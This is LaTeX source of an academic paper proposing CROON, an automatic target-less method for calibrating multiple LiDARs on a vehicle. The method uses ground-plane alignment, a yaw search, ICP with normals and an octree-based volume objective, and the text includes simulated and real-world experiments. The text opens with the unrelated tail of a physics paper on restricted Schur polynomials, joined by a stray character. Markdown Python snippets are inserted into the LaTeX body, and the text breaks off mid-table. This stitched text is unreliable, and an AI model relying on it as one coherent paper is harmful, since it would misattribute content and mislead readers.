The studies \cite{2012FromLargeN,2015RelationBetweenLargeDimension} focused on the leading order contribution, while \cite{2014HigherLoopNonplanar,2021OscillatingMultipleGiants,2011NonplanarIntegrability} focused on the su(2) sector. It would be interesting to see whether the result (\ref{subint}) can be recovered by making use of the su(3) symmetry that is present at one loop, and of the su(2|2) symmetry at higher loops. For this task, the action of the su(3) generators on restricted Schur polynomials \cite{2017RotatingRestrictedSchur} will be a useful result.
Finally, one question of clear physical significance is to understand the emergent gauge symmetry. An initial step in this direction was taken in \cite{2020CentralCharges}, by showing that the central extension of su(2$\vert$2) generates gauge transformations. This article has given an exact evaluation of the dilatation operator. It would be interesting to explore the arguments of \cite{2020CentralCharges} away from the distant corners approximation, where we expect U(1)$\times$U(1) to be enhanced to U(2). Does the central extension correctly generate gauge transformations in this setting?
\vfill\eject
|
\section{INTRODUCTION}
With the development of computing power, high-precision sensors, and further research in visual perception, autonomous driving has naturally become a focus of attention\cite{RN11,RN15,RN23}. 3D Light Detection and Ranging (LiDAR) has become the primary sensor due to its superior characteristics in three-dimensional range detection and point cloud density. In order to better perceive the surrounding environment, a configuration with multiple LiDARs is necessary. Empirically, five LiDARs configured as shown in Fig. \ref{LiDARs configuration}(a) can cover the near and far field. In order to obtain a wider field of view and a denser point cloud representation, it is worthwhile to accurately calculate the extrinsic parameters, i.e., the rotations and translations of the LiDARs, to transform the perceptions from multiple sensors into a unique frame.
\begin{figure}[ht]
\centering
\includegraphics[scale=0.15]{figures/pic1.png}
\caption{(a) LiDAR configuration in the simulated engine, (b) the field of view of the top, front, back, left, and right LiDARs; our unreal-world data set is collected under this configuration, (c) the field of view of the top, left, and right LiDARs; our real-world data set is collected under this configuration, (d) a sample of aligned unreal-world data.}
\label{LiDARs configuration}
\end{figure}
\begin{comment}
Like the eye of a human, the LiDAR of a vehicle provides surrounding environment information that can be used to process, including segmentation, detection, prediction, and planning. Therefore, a consistently extremely accurate vision system is vital for a vehicle; meanwhile, it should be able to find out and rectify the error timely instead of the regular manufacturer test. In the past several years, only a few methods were proposed to research sensor extrinsic parameters calibration, and some works only test in the laboratory environment or simulation data.
\end{comment}
The extrinsic parameters were calibrated manually at the very beginning. Nowadays there are many sensor extrinsic calibration methods, and they can be divided into target-based ones and motion-based ones. Target-based methods need auxiliary objects with distinguished geometric features. They solve the problem with the assistance of specific targets like retro-reflective landmarks\cite{RN14,RN19}, boxes\cite{RN17}, and a pair of special planes\cite{RN21}. On the contrary, motion-based strategies estimate relative poses of sensors by aligning estimated trajectories, and they rely heavily on vision and speed sensors, e.g., cameras and inertial measurement units (IMU), to enrich the constraints\cite{RN9,RN22}. Another type of target-less method alleviates the dependence on assistant items, but still requires special application scenarios\cite{RN18,RN11}. All of these facilitate the solution of the problem, but several limitations remain. Target-based methods require measuring unique markers\cite{RN14,RN19,RN17,RN21}, and the measurement inevitably introduces errors. Because of the initial preparations required in advance, target-based methods cannot be applied in large-scale cases. Motion-based methods are often used only for rough calibration, and they cannot obtain precise estimates because of equipment performance and trajectory limitations\cite{RN11}. Although some target-less methods have been proposed, they need strict initialization or specific environments, so they cannot be used efficiently. Existing methods still cannot meet the requirements of robustness, accuracy, automation, and independence simultaneously.
To address these issues, we propose CROON, a novel automatic multi-LiDAR Calibration and Refinement methOd in rOad sceNe: a two-stage calibration method consisting of a rough calibration component followed by a refinement calibration component. A LiDAR starting from an arbitrary initial pose can be calibrated into a relatively correct status in the rough calibration. We then develop an octree-based method to continue optimizing the LiDAR poses in the refinement calibration.
This two-stage framework is target-less, since CROON utilizes the natural characteristics of road scenes; it therefore has a low dependence on assistant objects and is much more applicable in various situations than target-based and motion-based methods.
Further, even with fewer targets, the two-stage framework and the associated carefully-designed optimization strategy still guarantee stronger robustness and higher accuracy than existing target-less methods.
In short, on the premise of a low dependence on auxiliary targets, the proposed CROON suffers no loss in robustness or accuracy in the task of extrinsic parameter calibration, which is verified by extensive empirical results.
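To illustrate the flavor of an octree-style refinement objective (a generic sketch of the idea of rewarding overlap between merged clouds, not the exact CROON cost function; the cell size and the synthetic data are arbitrary choices of ours):

```python
import numpy as np

def occupied_cells(points: np.ndarray, cell: float) -> int:
    """Count occupied grid cells; well-aligned clouds overlap and
    therefore occupy fewer cells in the merged point cloud."""
    keys = np.floor(points / cell).astype(np.int64)
    return len({tuple(k) for k in keys})

rng = np.random.default_rng(0)
cloud = rng.uniform(0.0, 10.0, size=(2000, 3))         # synthetic scene
aligned = np.vstack([cloud, cloud])                    # perfect extrinsics
shifted = np.vstack([cloud, cloud + [0.5, 0.0, 0.0]])  # mis-calibrated copy
assert occupied_cells(aligned, 0.25) < occupied_cells(shifted, 0.25)
```

Minimizing such an occupancy count over the extrinsic parameters drives the two clouds into overlap, which is the intuition behind the octree-based refinement stage.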
\begin{comment}
The two-stage framework and optimization guarantee the robustness and accuracy of CROON. Then, CROON is a target-less method used in ordinary road scenes without any measurement, preparation, and other auxiliary sensors. So it can be easily and automatically applied in familiar scenes. Through comprehensive experimental results, CROON shows promising performance in accuracy, automation, and independence.
\end{comment}
\begin{comment}
Autonomous driving has drawn more and more attention in industry and academia.
In order to make sure that the car can behave safely and normally in diverse urban environment, autonomous driving vehicles rely heavily on sensor-based environmental perception.
Enhancing the accuracy and generalization ability of the system requires multi-sensor collaboration (camera, radar, Lidar, GPS, IMU, etc.). Multiple sensors have to be calibrated accurately with respect to a common reference frame before implementing other perceptual tasks.
To our best knowledge, existing calibration methods mainly focus on the extrinsic parameters between two or more sensing modalities, like Lidar to camera\cite{levinson2013automatic,wang2020soic,pandey2015automatic}, Lidar to radar\cite{heng2020automatic,maddern2012lost,persic2017extrinsic} or multiple sensors\cite{domhof2019}.
However, there is not too much research in the field of the calibration between radars and vehicle reference frame.
In a variety of sensors, radar plays an important role in distance and speed measuring, radar point cloud is quite sparse, but it contains the information of radial velocity, azimuth and range, which are very useful in moving object detection and tracking.
Furthermore, compared with Lidar and camera, radar is not limited by weather conditions and is able to see through rain, fog and dust due to its strong penetration abilities, which enable autonomous vehicles to deal with some extreme weather conditions.
Generally, the detection accuracy of radar depends on intrinsic and extrinsic (mainly rotational) parameters. The precision and stability of external parameter calibration directly determine the performance of subsequent environment perception procedures and thereby affecting the driving behavior of the whole autonomous driving system.
In this paper, we propose an fully automatic calibration and refinement method for multiple radar sensors and which can be conducted under commonly seen road scenes without knowing initial extrinsic parameters. This method makes use of stationary targets within the radar's field of view while the vehicle is moving to form the initial calibration and thereafter optimization process, which could serve to large-scale autonomous vehicles as an offline calibration method.
\end{comment}
The contributions of this work are as follows:
\begin{enumerate}
\item The proposed method is the first-known automatic and target-less calibration method for multiple LiDARs in road scenes.
\item We introduce a rough calibration approach to recover the LiDARs from large deviations and an octree-based refinement method to optimize the LiDAR poses after the classic iterative closest point (ICP) step.
\item The proposed method shows promising performance on our simulated and real-world data sets; meanwhile, the related data sets and codes have been open-sourced to benefit the community.
\end{enumerate}
\section{RELATED WORK}
\begin{comment}
Sensor calibration can be separated into two distinct categories: extrinsic and intrinsic calibration. Intrinsic calibration is usually accomplished before doing extrinsic calibration, which estimates the operational parameters of sensors. For example, Bogdan et al. \cite{bogdan2018deepcalib} extimate the focal length and distortion parameter of camera by CNN. Mirzaei et al. \cite{mirzaei2012} compute Lidar intrinsic parameters using least-squares method. By contrast, extrinsic calibration aims to determine the rigid transformations (i.e. 3D rotation and translation) of the sensor coordinate frame to other sensors or reference frames. because the rigid transformation is not feasible to measure directly due to the low error tolerance for AVs.
Existing automatic extrinsic calibration method can be mainly divided into two categories: target-based and target-less method. Target-based method usually requires special made calibration targets to make sure all features can be extracted accurately.
For extrinsic Lidar-camera calibration, Geiger et al. \cite{geiger2012automatic} perform corner points detection by convoluting corner prototypes with picture to obtain a corner likelihood image, then the positions with large convolution response are considered as the candidate positions of checkerboard corner points, then non maximum suppression is used for filtering. Finally, gradient statistics is used to verify these candidate points in an $n \times n$ local neighborhood. Zhou et al. \cite{zhou2018automatic} introduce the 3D line correspondence into the original plane correspondence, which reduces the required calibration target poses to one. In addition, the similarity transformation technique
eliminates the error caused by checkerboard size.
As for extrinsic calibration of Lidar and radar sensors, Peršić et al. \cite{persic2017extrinsic} design a triangular trihedral corner reflector. The 3D position of the calibration target is located by finding the laser scan plane correspond to triangle board in Lidar frame and average high radar-cross-section (RCS) values in radar frame respectively. The extrinsic calibration is found by optimizing reprojection error followed by further refinement using additional RCS information.
However, making calibration targets and setting up the calibration environment normally consumes a lot of time and labor, and the targets must be presented all the time during the calibration procedure. Target-less methods address these drawbacks by taking advantage of the features in nature environment. Pandey et al. \cite{pandey2012automatic} extract the reflectivity of the 3D points obtained from Lidar and the pixel intensity of camera image as mutual information (MI) and find the optimal calibration by maximizing MI. Ma et al. \cite{ma2021crlf} solve the same calibration by using the line features in the road scene to formulate the initial rough calibration and refine it by searching on 6-DoF extrinsic parameters. Schöller et al. \cite{scholler2019} propose a radar to camera calibration approach by applying CNN to extract features from images and projected radar detection, the output layer has four neurons which corresponds to quaternion indicating the rotation between radar and camera frame. It is noteworthy that there are few automatic target-less methods to solve the extrinsic calibration of radar sensors.
Heng et al. \cite{lionel2020} propose an automatic target-less extrinsic calibration method for multiple 3D LiDARs and radars
by dividing the task into three subtasks: multi-LiDAR calibration, 3D map construction and radar calibration. They optimize the calibration results for the LiDARs and radars by minimizing the point-to-plane distances from the LiDAR scans and radar scans to the 3D map, respectively. In addition, the radial velocity measured by the radars is taken into account to further refine the extrinsic parameters.
For calibration between radar sensors and the vehicle reference frame, Izquierdo et al. \cite{Izquierdo2018} propose an automatic and unsupervised method that records highly reflective static elements such as lights or traffic signs in a high-definition (HD) map and then obtains the extrinsic calibration by registering radar scans to the corresponding targets. However, this method requires very precise localization (less than 2 cm) in the HD map. Compared with the above two methods, our calibration method requires neither building a local map nor a pre-prepared HD map.
\end{comment}
Extrinsic calibration aims to determine the rigid transformation (i.e., 3D rotation and translation) from a sensor coordinate frame to other sensor or reference frames \cite{RN41}. Methods for the extrinsic calibration of sensor systems with LiDARs can be divided into two categories: (1) motion-based methods, which estimate the relative poses of sensors by aligning trajectories estimated from independent sensors or fused sensor information, and (2) target-based/appearance-based methods, which need specific targets with distinctive geometric features such as a checkerboard.
Motion-based approaches are known as hand-eye calibration in simultaneous localization and mapping (SLAM). Hand-eye calibration was first proposed to map sensor-centered measurements into the robot workspace frame, which allows the robot to precisely move the sensor \cite{RN39,RN40,RN42}. The classic formulation of hand-eye calibration is $AX = XB$, where $A$ and $B$ represent the motions of the two sensors, respectively, and $X$ refers to the transformation between the two sensors. Heng et al. \cite{RN36} proposed a versatile method to estimate the intrinsics and extrinsics of multiple cameras with the aid of a chessboard and odometry. Taylor et al. \cite{RN22, RN9} introduced a calibration method for multi-modal sensor systems that requires less initial information. Qin et al. \cite{RN35} proposed a motion-based method to estimate the online temporal offset between the camera and IMU. They also proposed to estimate the camera-IMU transformation in an online manner via visual-inertial navigation systems \cite{RN34}. The work in \cite{RN10} aligned the camera and LiDAR by using a sensor-fusion odometry method. In addition, Jiao et al. \cite{RN11} proposed a fusion method that includes motion-based rough calibration and target-based refinement. It is worth noting that motion-based methods depend heavily on the results of the vision sensors and cannot handle motion drift well.
Target-based approaches recover the spatial offset of each sensor and stitch all the data together. Therefore, the target must be observable to the sensors, and corresponding points must exist. Gao et al. \cite{RN14} estimated the extrinsic parameters of dual LiDARs using assistant retro-reflective landmarks on poles, which provide a distinctive reflectance signal. Xie et al. \cite{RN13} demonstrated a solution for calibrating multi-modal sensors using AprilTags in an automatic and standard procedure for industrial production. Similarly, Liao et al. \cite{RN28} proposed a toolkit that replaces AprilTags with polygons. Kim et al. \cite{RN15} proposed an algorithm that uses a reflective conic target and calculates the relative pose by ICP. The methods of \cite{RN13,RN15} complete the final calibration by using parameters of the special targets that are known in advance, so exact measurements are essential. Zhou et al. \cite{RN25} demonstrated a method that facilitates calibration by establishing line and plane correspondences on a chessboard. Z. Pusztai \cite{RN17} introduced a method that mainly exploits the perpendicularity of boxes for accurate calibration of a camera-LiDAR system. Choi et al. \cite{RN21} designed an experiment to estimate the extrinsic parameters of two single-line laser sensors by using a pair of orthogonal planes. Similarly, three linearly independent planar surfaces were used in the automatic LiDAR calibration work of \cite{RN18}.
Truly automatic and target-less calibration methods are attracting more and more attention. He et al. \cite{RN29,RN30} extracted point, line, and plane features from 2D LiDARs in natural scenes and calibrated each sensor to the frame of a moving platform by matching the multi-type features. An automatic extrinsic calibration method for 2D and 3D LiDARs was put forward in \cite{RN32}. Pandey et al. \cite{RN33} demonstrated that a mutual-information-based algorithm can benefit the calibration of a 3D laser scanner and an optical camera.
\section{METHODOLOGY}
In our experiment, we have five LiDARs, which can be divided into two classes: a master and four slaves. The top LiDAR is the master LiDAR $PC_{m}$ and the rest (front, back, left, right) are the slave LiDARs $PC_{s}$ ($PC_{f}$, $PC_{b}$, $PC_{l}$, $PC_{r}$). Our goal is to calibrate the LiDARs by estimating the extrinsic parameters, i.e., the rotation $\bm{R}$ and translation $\bm{T}$, and finally to fuse all the LiDAR data into a single point cloud as demonstrated in Fig.\ref{LiDARs configuration}(d). $\bm{R}$ and $\bm{T}$ can be subdivided into $angle_{pitch},angle_{roll},angle_{yaw}$ and $x,y,z$, which represent the rotation angles and translations along the three axes, respectively. The problem can be defined as follows:
\begin{equation}\label{origin cost function}
\begin{aligned}
\bm{R}^*,\bm{T}^*\ =\ \arg\underset{\bm{R} ,\bm{T}}{\min}\sum\limits _{n=1}^{N} \lvert\lvert (\bm{R}\, PC_{s}^{n}+\bm{T}) -PC_{m}^{n} \rvert\rvert_2
\end{aligned}
\end{equation}
\noindent where $\lvert\lvert\cdot\rvert\rvert_2 $ indicates the $l_{2}$-norm of a vector and $PC_{s}^{n}$, $PC_{m}^{n}$ denote the $n$-th pair of corresponding points in the slave and master point clouds.
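As an illustration, the objective of Eq.~(\ref{origin cost function}) can be sketched in a few lines. The brute-force nearest-neighbor correspondence below is our assumption for clarity; a real implementation would use a k-d tree:

```python
import numpy as np

def registration_cost(pc_s, pc_m, R, T):
    """l2 registration cost: transform the slave cloud by (R, T) and sum
    the distances from each transformed point to its nearest master point."""
    transformed = pc_s @ R.T + T  # (N, 3) slave points expressed in the master frame
    # brute-force nearest-neighbor distances (O(N*M), fine for a sketch)
    d = np.linalg.norm(transformed[:, None, :] - pc_m[None, :, :], axis=2)
    return float(d.min(axis=1).sum())
```

The cost vanishes exactly when the transformed slave points coincide with master points, which is the minimum sought in Eq.~(\ref{origin cost function}).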
\begin{figure*}[t]
\centering
\includegraphics[scale=0.2]{figures/mid_process_v3.png}
\caption{The different stages of our method on the real/unreal-world data sets. The first two rows show the top view and left view of the unreal-world data; the last two rows show the top view and left view of the real-world data. Column (a) shows the initial pose, column (b) the result after the ground planes of the point clouds are calibrated, column (c) the result after rough calibration, and column (d) the result after refinement calibration.}
\label{aligned data}
\end{figure*}
It is not tractable to optimize the $6$-DoF problem from the beginning because the range of the parameters is too large. Therefore, in the first subsection we propose a solution that narrows the range quickly and robustly.
\subsection{Rough Calibration}
The proposed method is applied to road scenes, which exist widely. On the road, a LiDAR can easily sample a large amount of ground-plane information; therefore, the ground plane can almost always be registered correctly, which means that $angle_{pitch}$, $angle_{roll}$, and $z$ are solved. The first step of our algorithm is thus a rough registration that takes advantage of this characteristic.
Suppose the plane containing the most points is taken as the ground plane $GP:\{a,b,c,d\}$:
\begin{equation}\label{GP extration}
\begin{aligned}
GP:\{a,b,c,d\} = \arg\underset{plane}{\max}\ \lvert \{(x_i,y_i,z_i) \in plane \mid \lvert ax_i + by_i + cz_i + d \rvert \leq \epsilon \} \rvert
\end{aligned}
\end{equation}
where $plane \subset PC$ and $\epsilon$ is the threshold on the plane thickness.
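The ground-plane extraction above can be sketched as a RANSAC-style search. The random sampling scheme and the iteration count are our assumptions; the text does not specify the search strategy:

```python
import numpy as np

def extract_ground_plane(pc, eps=0.05, iters=300, rng=None):
    """RANSAC-style sketch: find the plane (a, b, c, d) maximizing the number
    of inliers satisfying |a*x + b*y + c*z + d| <= eps."""
    rng = np.random.default_rng(rng)
    best_plane, best_count = None, -1
    for _ in range(iters):
        p1, p2, p3 = pc[rng.choice(len(pc), 3, replace=False)]
        n = np.cross(p2 - p1, p3 - p1)
        norm = np.linalg.norm(n)
        if norm < 1e-9:  # degenerate (collinear) sample, skip
            continue
        n /= norm
        d = -n @ p1                                   # plane: n . x + d = 0
        count = int((np.abs(pc @ n + d) <= eps).sum())  # inliers within eps
        if count > best_count:
            best_plane, best_count = (*n, d), count
    return best_plane, best_count
```

In practice one would refine the winning plane by least-squares fitting over its inliers before aligning the normals.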
This ground plane is used to align the slave-LiDAR ground planes $GP_{s}$ ($GP_{f}$, $GP_{b}$, $GP_{l}$, $GP_{r}$) to the master-LiDAR ground plane $GP_{m}$:
\begin{equation}\label{GP registration axis}
\begin{aligned}
\vec{n} = \overrightarrow{GP_m} \times \overrightarrow{GP_s}
\end{aligned}
\end{equation}
\begin{equation}\label{GP registration angle}
\begin{aligned}
\theta = \arccos\left( \overrightarrow{GP_m} \cdot \overrightarrow{GP_s} \right)
\end{aligned}
\end{equation}
where $\vec{n}$, $\theta$, $\overrightarrow{GP_m}$ and $\overrightarrow{GP_s}$ represent the rotation axis, the rotation angle, and the unit normal vectors of the master and slave ground planes, respectively. The transformation matrix can then be computed by the Rodrigues rotation formula.
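The axis-angle alignment above can be sketched as follows; the sign convention here is chosen so that the slave normal is rotated onto the master normal, and the antiparallel special case is our addition for robustness:

```python
import numpy as np

def rodrigues(axis, theta):
    """Rotation matrix from the Rodrigues formula R = I + sin(t) K + (1-cos(t)) K^2."""
    axis = axis / np.linalg.norm(axis)
    K = np.array([[0., -axis[2], axis[1]],
                  [axis[2], 0., -axis[0]],
                  [-axis[1], axis[0], 0.]])  # cross-product matrix of the axis
    return np.eye(3) + np.sin(theta) * K + (1 - np.cos(theta)) * (K @ K)

def align_ground_planes(n_m, n_s):
    """Rotation taking the slave ground normal n_s onto the master normal n_m."""
    n_m = n_m / np.linalg.norm(n_m)
    n_s = n_s / np.linalg.norm(n_s)
    axis = np.cross(n_s, n_m)  # rotates n_s toward n_m (right-hand rule)
    theta = np.arccos(np.clip(n_s @ n_m, -1.0, 1.0))
    if np.linalg.norm(axis) < 1e-9:      # normals (anti-)parallel
        if theta < 1e-6:
            return np.eye(3)
        perp = np.cross(n_s, [1.0, 0.0, 0.0])   # any axis perpendicular to n_s
        if np.linalg.norm(perp) < 1e-9:
            perp = np.cross(n_s, [0.0, 1.0, 0.0])
        return rodrigues(perp, np.pi)           # 180-degree flip
    return rodrigues(axis, theta)
```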
\begin{comment}
In order to extract the more flatness ground plane, we use a multi-scale search algorithm which has several different sampling coefficients. A relative right pose could be got after that processing and then we would divide the ground plane point could into smaller point clouds. In each subset we would calculate a more accurate ground plane equation. Finally, the ground plane equation would be very accurate by summing the results of all subsets.
\end{comment}
It is worth noting that an extreme case can occur in which the estimated pitch/roll differs from the actual pitch/roll by $\pm \pi$. The method therefore needs to check whether most of the points of $PC_{s}$ lie on the ground plane after the calibration. From the point cloud with the ground points removed, the direction of the ground-plane normal vector can be confirmed quickly, and all $GP$ normal vectors should point in the same direction, i.e., $\overrightarrow{GP_m} = \overrightarrow{GP_s}$.
Through the above measures, a rough estimate of $angle_{pitch}$, $angle_{roll}$ and $z$ can be established. The next step is the calibration of $angle_{yaw}$, $x$ and $y$. The cost function can be simplified from (\ref{origin cost function}):
\begin{equation}\label{simplified cost function}
\begin{aligned}
&angle^{*}_{yaw} ,\ x^*,\ y^*\ =
\\ \ &\arg\underset{yaw,x,y}{\min}\sum \sqrt{( x_{s} -x_{m})^{2} +( y_{s} -y_{m})^{2}}
\end{aligned}
\end{equation}
The number of arguments decreases from 6 to 3. More importantly, the ground points can be ignored, which brings three obvious advantages: a) the computational complexity is reduced significantly because the proportion of ground points is very high; b) points with more distinctive characteristics are retained because the relatively featureless ground points have been discarded; c) points that have a more significant impact on the cost function are sampled, because the error of distant points better reflects the calibration quality in practice.
In real applications, we approximately solve Eq.~(\ref{simplified cost function}) by first finding the optimal $angle_{yaw}$ and then the optimal $x$ and $y$, because the pose error caused by rotation affects the loss function more than that caused by translation. We scan the range of $angle_{yaw}$ using a binary search.
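A sketch of this coarse-then-binary yaw search follows. The grid resolution and the chamfer-style cost are our assumptions; the paper only states that the yaw range is scanned by binary search:

```python
import numpy as np

def chamfer(a, b):
    """Sum of nearest-neighbor distances from cloud a to cloud b (brute force)."""
    d = np.linalg.norm(a[:, None, :] - b[None, :, :], axis=2)
    return float(d.min(axis=1).sum())

def rot_z(a):
    """Rotation about the z-axis (yaw) by angle a."""
    c, s = np.cos(a), np.sin(a)
    return np.array([[c, -s, 0.], [s, c, 0.], [0., 0., 1.]])

def best_yaw(pc_s, pc_m, n_coarse=36, refine_iters=20):
    """Coarse scan over yaw, then halve the search interval around the best
    angle -- the binary-search refinement described in the text."""
    angles = np.linspace(-np.pi, np.pi, n_coarse, endpoint=False)
    best = min(angles, key=lambda a: chamfer(pc_s @ rot_z(a).T, pc_m))
    step = 2 * np.pi / n_coarse
    for _ in range(refine_iters):
        step /= 2
        best = min((best - step, best, best + step),
                   key=lambda a: chamfer(pc_s @ rot_z(a).T, pc_m))
    return best
```

The same one-dimensional scan can then be repeated for $x$ and $y$ with the yaw fixed.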
\begin{comment}
Not all points are useful, and the same is true for $angle_{yaw}, x, y $. For example, when the error of $angle_{yaw}$ is $ 1\degree$, the error at a point ten meters away is $0.17m$. It means that the offset of $x$ or $y$ must be $17cm$ to achieve the same effect, so the pose error caused by rotation is much greater than that caused by translation, and we focus more on $angle_{yaw}$ than $x,y$. According to the explanation above, the problem of $angle_{yaw}, x, y $ can be approximated as finding the optimal $angle_{yaw}$ firstly. We choose to scan the range of $angle_{yaw}$ by using binary search.
\end{comment}
\subsection{Refinement Calibration}
After the rough registration described in the last subsection, the pose of each LiDAR is roughly correct and can be refined further. In this section, we continue improving the calibration accuracy with iterative closest point with normals (ICPN) and an octree-based optimization.
We first use a variant of ICP. The original ICP finds the optimal transform between two point clouds that minimizes the loss function $ \sum\limits _{n=1}^{N} \lvert\lvert PC_{s} -PC_{m} \rvert\rvert $. The method requires a good initialization and easily gets trapped in local optima. We therefore adopt ICPN, a variant of ICP that achieves better performance. Due to the sparsity of the point cloud, point features are not explicit and are hard to extract. ICPN enriches the point features by attaching a normal to each point. A point normal encodes the position information of the point and, more importantly, provides information about the neighboring points. Together, these expand the receptive field of every point and better utilize local information for calibration. In our implementation, the normal of each point is calculated by PCA from the 40 nearest neighboring points.
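The per-point normal estimation used by ICPN can be sketched as follows: the normal is the eigenvector of the neighborhood covariance with the smallest eigenvalue. The brute-force neighbor search is an assumption for brevity (a k-d tree would be used in practice):

```python
import numpy as np

def estimate_normals(pc, k=40):
    """Per-point normals via PCA over the k nearest neighbors of each point."""
    d = np.linalg.norm(pc[:, None, :] - pc[None, :, :], axis=2)
    idx = np.argsort(d, axis=1)[:, :k]        # indices of k nearest neighbors
    normals = np.empty_like(pc)
    for i, nb in enumerate(idx):
        pts = pc[nb] - pc[nb].mean(axis=0)    # centered neighborhood
        # eigh returns eigenvalues in ascending order: the eigenvector of the
        # smallest eigenvalue of the 3x3 covariance is the surface normal
        w, v = np.linalg.eigh(pts.T @ pts)
        normals[i] = v[:, 0]
    return normals
```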
\begin{figure}[ht]
\centering
\includegraphics[scale=0.2]{figures/octree-based_method.jpg}
\caption{Octree-based method. Cubes containing points are marked in blue and cubes without points in green. The cubes are subdivided iteratively, and the volume of the blue/green cubes measures the quality of the calibration.}
\label{octree}
\end{figure}
\begin{figure*}[ht]
\centering
\includegraphics[scale=0.2]{figures/real_world_boxplot.png}
\caption{Experimental results on ten real road scenes. In each scene, we collect 250 sets of data, repeat the calibration 250 times, and calculate the mean and standard deviation of the 6-DoF results.}
\label{plotbox of real scene}
\end{figure*}
Furthermore, we continue minimizing the pose error with the octree-based optimization illustrated in Fig.\ref{octree}. At the beginning, the two point clouds $PC$ are wrapped in a cube $_{o}C$. We then use the octree structure to cut the cube equally into eight smaller cubes.
\begin{equation}\label{cut the cube}
\begin{aligned}
_{p}C \stackrel{cut }{\Longrightarrow} \{_{c}C_1, _{c}C_2,\cdots, _{c}C_7, _{c}C_8\}
\end{aligned}
\end{equation}
where $_{p}C$ represents a parent cube and $_{c}C_{i}$ the child cubes of $_{p}C$. The cutting procedure is repeated iteratively to obtain more and smaller cubes. As shown in Fig.\ref{octree}, we mark the cubes containing points in blue and the cubes without points in green, denoted $C^b$ and $C^g$, respectively. The volume of $_{o}C$ can be expressed as follows:
\begin{equation}\label{calculate the space}
\begin{aligned}
V_{_{o}C} = \sum\limits _{i=1}^{N} V_{C^b_i} + \sum\limits _{j=1}^{M} V_{C^g_j}
\end{aligned}
\end{equation}
where $N$ and $M$ refer to the numbers of $C^b$ and $C^g$, respectively. When the side length of the small cubes is short enough, we can approximate the space volume occupied by the point cloud by the volume of the blue cubes. When two point clouds are aligned accurately, the space volume occupied by the point clouds reaches its minimum, and the volume of the blue cubes reaches its minimum at the same time. So the problem can be converted to:
\begin{comment}
When we choose an appropriate value of side length, It is comprehensible that the number of blue/green cubes represents the quality of the point cloud registration. Take the puzzle as an example. An unassigned puzzle occupies more area than an assigned puzzle because there exists so much white space in an unassigned puzzle, and the assigned puzzle occupies the smallest space. An analogy to three-dimensional space, when two point clouds are aligned correctly, the number of blue cubes is the least, and the number of green cubes is the most:
\end{comment}
\begin{equation}\label{octee-based optimal}
\begin{aligned}
\bm{R}^*,\bm{T}^*\ =\ \arg\underset{\bm{R} ,\bm{T}}{\min} \sum\limits _{i=1}^{N} V_{C^b_i}
\end{aligned}
\end{equation}
Considering that the current pose is already close to the correct one, we optimize the formula above by scanning the domain of the arguments.
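The occupied-volume objective above can be sketched with a uniform voxel grid, which is equivalent to counting the blue cubes at the finest octree level; the edge length is an assumed parameter:

```python
import numpy as np

def occupied_volume(pc, side):
    """Volume occupied by a point cloud, approximated by counting the distinct
    cubes of edge length `side` that contain at least one point (the blue cubes)."""
    cells = np.unique(np.floor(pc / side).astype(int), axis=0)
    return len(cells) * side ** 3

def alignment_score(pc_a, pc_b, side=0.2):
    """Joint occupied volume of two clouds; smaller means better aligned."""
    return occupied_volume(np.vstack([pc_a, pc_b]), side)
```

Scanning the 6-DoF arguments to minimize `alignment_score` corresponds to the octree-based refinement: a well-aligned pair of clouds fills the fewest cubes.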
\section{EXPERIMENTS}
In this section, we apply our method to two data sets of different styles. The real data set is collected from our driverless vehicle platform, which is equipped with three LiDARs on the top, left, and right of the vehicle. The three LiDARs are high-precision, with a large field of view, a 10 Hz refresh rate, and well-calibrated intrinsics. The other data set is collected from the Carla simulation engine \cite{Dosovitskiy17}; the driverless vehicle in the unreal engine has additional LiDARs at the front and back. To analyze the accuracy, robustness, and efficiency of the proposed calibration method, we test it on a number of different road conditions. Experimental results show that our method achieves better performance than state-of-the-art approaches in terms of accuracy and robustness.
\begin{table*}[b]
\centering
\setlength{\tabcolsep}{5mm}
\renewcommand{\arraystretch}{1.2}
\caption{Quantitative results on the simulated data set.}
\begin{tabular}{cccccccc}
\hline
\multicolumn{2}{c}{\multirow{2}{*}{\textbf{LiDAR position}}} & \multicolumn{3}{c}{\textbf{Rotation Error{[}deg{]}}} & \multicolumn{3}{c}{\textbf{Translation Error{[}m{]}}} \\ \cline{3-8}
\multicolumn{2}{c}{} & \textbf{pitch} & \textbf{roll} & \textbf{yaw} & \textbf{x} & \textbf{y} & \textbf{z} \\ \hline
\multirow{2}{*}{front LiDAR} & \textbf{mean} & -0.0111 & -0.0124 & 0.0049 & 0.0028 & -0.0005 & -0.0013 \\ \cline{2-8}
& \textbf{std} & 0.0407 & 0.0310 & 0.0875 & 0.0363 & 0.0075 & 0.0030 \\ \hline
\multirow{2}{*}{back LiDAR} & \textbf{mean} & -0.0108 & 0.0163 & -0.0234 & -0.0163 & -0.0007 & -0.0010 \\ \cline{2-8}
& \textbf{std} & 0.0266 & 0.0363 & 0.1451 & 0.1070 & 0.0149 & 0.0037 \\ \hline
\multirow{2}{*}{left LiDAR} & \textbf{mean} & -0.0220 & -0.00004 & 0.0029 & -0.0033 & -0.0005 & -0.0014 \\ \cline{2-8}
& \textbf{std} & 0.0290 & 0.0106 & 0.0760 & 0.0460 & 0.0114 & 0.0022 \\ \hline
\multirow{2}{*}{right LiDAR} & \textbf{mean} & 0.0105 & 0.0087 & 0.0133 & -0.0003 & 0.0020 & 0.0011 \\ \cline{2-8}
& \textbf{std} & 0.0291 & 0.0293 & 0.0747 & 0.0446 & 0.0075 & 0.0075 \\ \hline
\end{tabular}
\label{unreal world statistic results}
\end{table*}
Because there is no ground truth for the real data set, we only evaluate those results qualitatively. In contrast, the simulated data has ground truth, so the method can be tested fully through both quantitative and qualitative analysis.
\subsection{Realistic Experiment}
In this section, we first collect real-world point cloud data in several different road scenes in our city. It should be noted that the LiDARs have an initial mounting angle and position offset. We add random deviations to the LiDARs of up to $\pm 45\degree$ in $pitch, roll, yaw$ and $\pm 10cm$ in $x, y, z$. By adding such artificial deviations and measuring continuously in one scene, we can evaluate the consistency and accuracy of the method; furthermore, the results across different scenes show its robustness and stability.
\subsubsection{Qualitative Results}
Our method consists of two stages: rough calibration and refinement calibration. The last two rows of Fig.\ref{aligned data} show the point clouds at the different stages in a real scene: the third row is the top view and the fourth row is the left view. Columns (a)-(d) of Fig.\ref{aligned data} show the initial pose, the ground-plane calibration, the rough calibration, and the refined calibration, respectively. The point clouds from the three LiDARs have a large initial deviation in column (a). After the ground-plane calibration, the non-ground points are aligned by the rough and refinement calibration in columns (c) and (d), where the poses of the three point clouds are quite accurate.
\begin{table*}[]
\centering
\setlength{\tabcolsep}{5mm}
